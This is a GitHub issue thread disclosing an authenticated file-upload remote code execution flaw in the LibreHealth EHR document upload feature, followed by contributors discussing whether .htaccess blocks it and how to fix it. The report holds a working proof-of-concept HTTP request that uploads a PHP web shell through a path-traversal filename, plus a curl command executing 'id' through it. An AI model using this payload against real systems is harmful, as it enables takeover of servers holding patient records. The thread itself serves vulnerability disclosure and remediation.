lh-ehr icon indicating copy to clipboard operation
lh-ehr copied to clipboard

Published 20 hours ago verified publisher icon LibreHealthIO

Security Issue: Remote code execution in Misc->New Documents

Open C-Sto opened this issue 5 years ago • 7 comments

The Issue

Arbitrary file upload vulnerability allowing any user who can upload patient documents the ability to run arbitrary system commands on the host machine. As with the user profile picture vulnerability, once a malicious document is uploaded by an authenticated user, it does not require authentication in order to execute system commands.

In lh-ehr, an attacker must be authenticated, and have sufficient privileges to upload a patient document via the 'Miscellaneous -> New Documents' function.

Issue location

Occurs at https://github.com/LibreHealthIO/lh-ehr/blob/5b5f427c4742f901e426f17325fb0aaf8209e0bb/controllers/C_Document.class.php#L158-L192

POC:

POST /lh-ehr/controller.php?document%00&upload&patient_id=00&parent_id=13& HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.107/lh-ehr/controller.php?document&upload&patient_id=00&parent_id=13&
Content-Type: multipart/form-data; boundary=---------------------------130432852327676
Content-Length: 764
Cookie: TreeMenuBranchStatus=; LibreHealthEHR=rj2qsugifs5g94fhvpttg8uotb
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------130432852327676
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------130432852327676
Content-Disposition: form-data; name="file[]"; filename="../../hack.php"
Content-Type: application/x-msdownload

<?php echo `$_GET[cmd]`; ?>

-----------------------------130432852327676
Content-Disposition: form-data; name="destination"


-----------------------------130432852327676
Content-Disposition: form-data; name="patient_id"

00
-----------------------------130432852327676
Content-Disposition: form-data; name="category_id"

13
-----------------------------130432852327676
Content-Disposition: form-data; name="process"

true
-----------------------------130432852327676--

root@ubuntu:/var/www/html/lh-ehr# curl 127.0.0.1/lh-ehr/sites/default/documents/00/1371/hack.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

C-Sto avatar Aug 12 '18 09:08 C-Sto

Authorized user hack possible. Anyone care to address this? The "filemanager" tool is fully sand-boxed, but these normal document uploads are not. Needs to have at least an executable file extension mask on the allowed upload, right? HOWEVER: Attempted to execute the code with a properly configured system as per installation instructions: image

I attempted to access the code I uploaded, but the whole /sites/ directory seems pretty well protected. How should I go about implementing an attack using the uploaded code as a proof?

aethelwulffe avatar Oct 01 '18 16:10 aethelwulffe

Strange, the .htaccess file should have prevented execution on my system too.

I suspect it might be possible to overwrite it with the right parameters, which would then allow execution.

C-Sto avatar Nov 05 '18 05:11 C-Sto

i would like to be assigned this issue

wisdommatt avatar Mar 25 '20 22:03 wisdommatt

Go ahead

On Wed, 25 Mar 2020 at 23:26 wisdommatthew [email protected] wrote:

i would like to be assigned this issue

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/LibreHealthIO/lh-ehr/issues/1224#issuecomment-604119640, or unsubscribe https://github.com/notifications/unsubscribe-auth/AD4X4XRPK7XUN6LWJ3W56Z3RJKAH3ANCNFSM4FPF4AHA .

--

MUA N. LAURENT: Lead Software Engineer Akivas Inc. https://akivas.com/ Akwa, Douala,CM 00237 | 174 Royal Rd, Cape Town, WC 7405, SA Phone: (237) 670-518-086

muarachmann avatar Mar 25 '20 22:03 muarachmann

it also accepts upload of php files

i think it would be more secured to restrict upload files to just some file formats

wisdommatt avatar Mar 26 '20 00:03 wisdommatt

I have tested the remote code execution issue. .htaccess blocks file access to the uploaded files.

Screenshot (268)

@C-Sto i think why yours went through might be because the site did not set up completely

wisdommatt avatar Mar 26 '20 02:03 wisdommatt

That sounds accurate - I had a bunch of issues in getting it set up and working.

I suspect that if you can upload .htaccess files to that folder then you would be able to override the restrictions, though.

C-Sto avatar Apr 08 '20 00:04 C-Sto